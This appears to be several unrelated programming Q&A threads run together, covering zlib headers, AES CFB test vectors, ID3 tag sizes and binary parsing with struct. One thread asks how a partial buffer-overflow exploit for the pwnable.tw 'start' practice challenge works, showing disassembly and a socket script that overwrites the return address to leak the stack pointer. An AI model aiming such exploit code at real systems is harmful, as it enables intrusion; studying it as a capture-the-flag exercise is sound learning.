I have raw data extracted from PDF and I decompressed the raw data and compressed it again.
I expected the same header and trailer, but the header was changed.
Original Hex Header
48 89 EC 57 ....
Converted Hex Header
78 9C EC BD ...
I dug into zlib compression and got header 48 also is one of zlib.header.
But mostly 78 is used for zlib compression.
It's my code which decompress and compress:
decompress_wbit = 12
compress_variable = 6
output_data = zlib.decompress(open(raw_data, "rb").read(), decompress_wbit)
output_data = zlib.compress(output_data, 6)
output_file = open(raw_data + '_', "wb")
output_file.write(output_data)
output_file.close()
I changed the decompress_wbit and compress_variable but still keeps 78.
So not sure how to get 48 as header.
Here is the short description about zlib.header.
CINFO (bits 12-15)
Indicates the window size as a power of two, from 0 (256 bytes) to 7 (32768 bytes). This will usually be 7. Higher values are not allowed.
CM (bits 8-11)
The compression method. Only Deflate (8) is allowed.
FLEVEL (bits 6-7)
Roughly indicates the compression level, from 0 (fast/low) to 3 (slow/high)
FDICT (bit 5)
Indicates whether a preset dictionary is used. This is usually 0. 1 is technically allowed, but I don't know of any Deflate formats that define preset dictionaries.
FCHECK (bits 0-4)
A checksum (5 bits, 0..31), whose value is calculated such that the entire value divides 31 with no remainder.
Typically, only the CINFO and FLEVEL fields can be freely changed, and FCHECK must be calculated based on the final value.* Assuming no preset dictionary, there is no choice in what the other fields contain, so a total of 32 possible headers are valid. Here they are:
FLEVEL: 0 1 2 3
CINFO:
0 08 1D 08 5B 08 99 08 D7
1 18 19 18 57 18 95 18 D3
2 28 15 28 53 28 91 28 CF
3 38 11 38 4F 38 8D 38 CB
4 48 0D 48 4B 48 89 48 C7
5 58 09 58 47 58 85 58 C3
6 68 05 68 43 68 81 68 DE
7 78 01 78 5E 78 9C 78 DA
Please let me know how to keep the zlib.header while decompression & compression
Thanks for your time.
I will first note that it doesn't matter. The data will be decompressed fine with that zlib header. Why do you care?
You are giving zlib.compress a small amount of data that permits a smaller window. Since it is permitted, the Python library is electing to compress with a smaller window.
A way to avoid that would be to use zlib.compressobj instead. Upon initiation, it doesn't know how much data you will be feeding it and will default to the largest window size.
I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 push 0x20656874
8048078: 68 61 72 74 20 push 0x20747261
804807d: 68 73 20 73 74 push 0x74732073
8048082: 68 4c 65 74 27 push 0x2774654c
8048087: 89 e1 mov ecx,esp ; buffer = $esp
8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
8048099: 83 c4 14 add esp,0x14
804809c: c3 ret
0804809d <_exit>:
804809d: 5c pop esp
804809e: 31 c0 xor eax,eax
80480a0: 40 inc eax
Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.
However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?
from socket import *
from struct import *
c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))
# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.
This small python program should encrypt plain to cipher using AES in the CFB mode using a 128bit key
from Crypto.Cipher import AES
# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
key = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
iv = b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
plain = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
aes = AES.new(key, AES.MODE_CFB, iv)
cipher = aes.encrypt(plain)
print(' '.join('{:2x}'.format(b) for b in cipher))
I took this key, IV and plain cipher combination from one of the NIST test vectors (CFB128VarTxt128.rsp). For this particular combination I expect the cipher:
3a d7 8e 72 6c 1e c0 2b 7e bf e9 2b 23 d9 ec 34
but pycrypto calculates
3a 81 e1 d4 b8 24 75 61 46 31 63 4b 5c 79 d6 bc
The first byte is correct, whereas the others do not match. I also tried different test vectors, but the result stays the same. All bytes, except for the first byte, do not match.
I am quite sure, that the NIST test vectors are valid since I used them before when using AES with Crypto++ and I am also pretty sure, that the implementation of pycrypto is correct since its output agrees with online tools such as this page. Obviously, it is me, who is using the tools in an incorrect way...
Does anyone have a clue, how to reproduce the NIST test vectors with pycrypto?
This is the NIST example
# CAVS 11.1
# Config info for aes_values
# AESVS VarTxt test data for CFB128
# State : Encrypt and Decrypt
# Key Length : 128
# Generated on Fri Apr 22 15:11:53 2011
...
COUNT = 0
KEY = 00000000000000000000000000000000
IV = 80000000000000000000000000000000
PLAINTEXT = 00000000000000000000000000000000
CIPHERTEXT = 3ad78e726c1ec02b7ebfe92b23d9ec34
You are missing a keyword argument, segment_size, in your AES.new(...) call. This is the feedback size, and it defaults to 8. If your line of code is changed to
aes = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
you get the correct result.
As stated in the docs:
segment_size (integer) - (Only MODE_CFB).The number of bits the
plaintext and ciphertext are segmented in. It must be a multiple of 8.
If 0 or not specified, it will be assumed to be 8.
Your results correspond to what would likely be labeled "CFB8" in NIST docs.
I also get the same results as you when using AES.MODE_CFB, but I get the results you expect when I use AES.MODE_CBC instead.
from Crypto.Cipher import AES
def show(b):
print(*['{:02x}'.format(u) for u in b])
key = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
iv = b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
plain = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
crypto = AES.new(key, AES.MODE_CBC, iv)
cipher = crypto.encrypt(plain)
show(cipher)
# We need a fresh AES object to decrypt
crypto = AES.new(key, AES.MODE_CBC, iv)
decoded = crypto.decrypt(cipher)
show(decoded)
output
3a d7 8e 72 6c 1e c0 2b 7e bf e9 2b 23 d9 ec 34
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
I am trying to unpack the ID3v2.3 header with Python 2.7. However, I do not fully understand the first 10 bytes of the MP3 format. For example:
49 44 33 03 00 00 | 00 00 21 76 | 54 41 4C 42
.I .D .3 .3 .0 | RawSize | Size
Using Synalyze it! I can see that RawSize is 0x2176 and Size is 4342.
At offset 4352 is where the MPEG data frames begin. I need to know how
54 41 4C 42 gets converted to 4342 because when I tried:
>>> unpack('i', '\x54\x41\x4C\x42')
(1112293716,)
which does not look in anyways like 4352!
How should I read them in general?
Firstly, you give 14 bytes there, not 10.
Secondly, you've botched reading the size completely. The size uses unpacked 7-bit values rather than 8-bit values.
>>> 0x00 << 21 | 0x00 << 14 | 0x21 << 7 | 0x76
4342
A urllib2 request receives binary response as below:
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
Its structure is:
DATA, TYPE, DESCRIPTION
00 00 00 01, 4 bytes, Symbol Count =1
00 04, 2 bytes, Symbol Length = 4
41 4D 54 44, 6 bytes, Symbol = AMTD
00, 1 byte, Error code = 0 (OK)
00 00 00 02, 4 bytes, Bar Count = 2
FIRST BAR
41 97 33 33, 4 bytes, Close = 18.90
41 99 5C 29, 4 bytes, High = 19.17
41 90 3D 71, 4 bytes, Low = 18.03
41 91 D7 0A, 4 bytes, Open = 18.23
47 0F C6 14, 4 bytes, Volume = 3,680,608
00 00 01 16 6A E0 68 80, 8 bytes, Timestamp = November 23,2007
SECOND BAR
41 93 B4 05, 4 bytes, Close = 18.4629
41 97 1E B8, 4 bytes, High = 18.89
41 90 7A E1, 4 bytes, Low = 18.06
41 96 8F 57, 4 bytes, Open = 18.82
46 E6 2E 80, 4 bytes, Volume = 2,946,325
00 00 01 16 7A 53 7C 80, 8 bytes, Timestamp = November 26,2007
TERMINATOR
FF FF, 2 bytes,
How to read binary data like this?
Thanks in advance.
Update:
I tried struct module on first 6 bytes with following code:
struct.unpack('ih', response.read(6))
(16777216, 1024)
But it should output (1, 4). I take a look at the manual but have no clue what was wrong.
So here's my best shot at interpreting the data you're giving...:
import datetime
import struct
class Printable(object):
specials = ()
def __str__(self):
resultlines = []
for pair in self.__dict__.items():
if pair[0] in self.specials: continue
resultlines.append('%10s %s' % pair)
return '\n'.join(resultlines)
head_fmt = '>IH6sBH'
head_struct = struct.Struct(head_fmt)
class Header(Printable):
specials = ('bars',)
def __init__(self, symbol_count, symbol_length,
symbol, error_code, bar_count):
self.__dict__.update(locals())
self.bars = []
del self.self
bar_fmt = '>5fQ'
bar_struct = struct.Struct(bar_fmt)
class Bar(Printable):
specials = ('header',)
def __init__(self, header, close, high, low,
open, volume, timestamp):
self.__dict__.update(locals())
self.header.bars.append(self)
del self.self
self.timestamp /= 1000.0
self.timestamp = datetime.date.fromtimestamp(self.timestamp)
def showdata(data):
terminator = '\xff' * 2
assert data[-2:] == terminator
head_data = head_struct.unpack(data[:head_struct.size])
try:
assert head_data[4] * bar_struct.size + head_struct.size == \
len(data) - len(terminator)
except AssertionError:
print 'data length is %d' % len(data)
print 'head struct size is %d' % head_struct.size
print 'bar struct size is %d' % bar_struct.size
print 'number of bars is %d' % head_data[4]
print 'head data:', head_data
print 'terminator:', terminator
print 'so, something is wrong, since',
print head_data[4] * bar_struct.size + head_struct.size, '!=',
print len(data) - len(terminator)
raise
head = Header(*head_data)
for i in range(head.bar_count):
bar_substr = data[head_struct.size + i * bar_struct.size:
head_struct.size + (i+1) * bar_struct.size]
bar_data = bar_struct.unpack(bar_substr)
Bar(head, *bar_data)
assert len(head.bars) == head.bar_count
print head
for i, x in enumerate(head.bars):
print 'Bar #%s' % i
print x
datas = '''
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
'''
data = ''.join(chr(int(x, 16)) for x in datas.split())
showdata(data)
this emits:
symbol_count 1
bar_count 2
symbol AMTD
error_code 0
symbol_length 4
Bar #0
volume 36806.078125
timestamp 2007-11-22
high 19.1700000763
low 18.0300006866
close 18.8999996185
open 18.2299995422
Bar #1
volume 29463.25
timestamp 2007-11-25
high 18.8899993896
low 18.0599994659
close 18.4629001617
open 18.8199901581
...which seems to be pretty close to what you want, net of some output formatting details. Hope this helps!-)
>>> data
'\x00\x00\x00\x01\x00\x04AMTD\x00\x00\x00\x00\x02A\x9733A\x99\\)A\x90=qA\x91\xd7\nG\x0f\xc6\x14\x00\x00\x01\x16j\xe0h\x80A\x93\xb4\x05A\x97\x1e\xb8A\x90z\xe1A\x96\x8fWF\xe6.\x80\x00\x00\x01\x16zS|\x80\xff\xff'
>>> from struct import unpack, calcsize
>>> scount, slength = unpack("!IH", data[:6])
>>> assert scount == 1
>>> symbol, error_code = unpack("!%dsb" % slength, data[6:6+slength+1])
>>> assert error_code == 0
>>> symbol
'AMTD'
>>> bar_count = unpack("!I", data[6+slength+1:6+slength+1+4])
>>> bar_count
(2,)
>>> bar_format = "!5fQ"
>>> from collections import namedtuple
>>> Bar = namedtuple("Bar", "Close High Low Open Volume Timestamp")
>>> b = Bar(*unpack(bar_format, data[6+slength+1+4:6+slength+1+4+calcsize(bar_format)]))
>>> b
Bar(Close=18.899999618530273, High=19.170000076293945, Low=18.030000686645508, Open=18.229999542236328, Volume=36806.078125, Timestamp=1195794000000L)
>>> import time
>>> time.ctime(b.Timestamp//1000)
'Fri Nov 23 08:00:00 2007'
>>> int(b.Volume*100 + 0.5)
3680608
>>> struct.unpack('ih', response.read(6))
(16777216, 1024)
You are unpacking big-endian data on a little-endian machine. Try this instead:
>>> struct.unpack('!IH', response.read(6))
(1L, 4)
This tells unpack to consider the data in network-order (big-endian). Also, the values of counts and lengths can not be negative, so you should should use the unsigned variants in your format string.
Take a look at the struct.unpack in the struct module.
Use pack/unpack functions from "struct" package. More info here http://docs.python.org/library/struct.html
Bye!
As it was already mentioned, struct is the module you need to use.
Please read its documentation to learn about byte ordering, etc.
In your example you need to do the following (as your data is big-endian and unsigned):
>>> import struct
>>> x = '\x00\x00\x00\x01\x00\x04'
>>> struct.unpack('>IH', x)
(1, 4)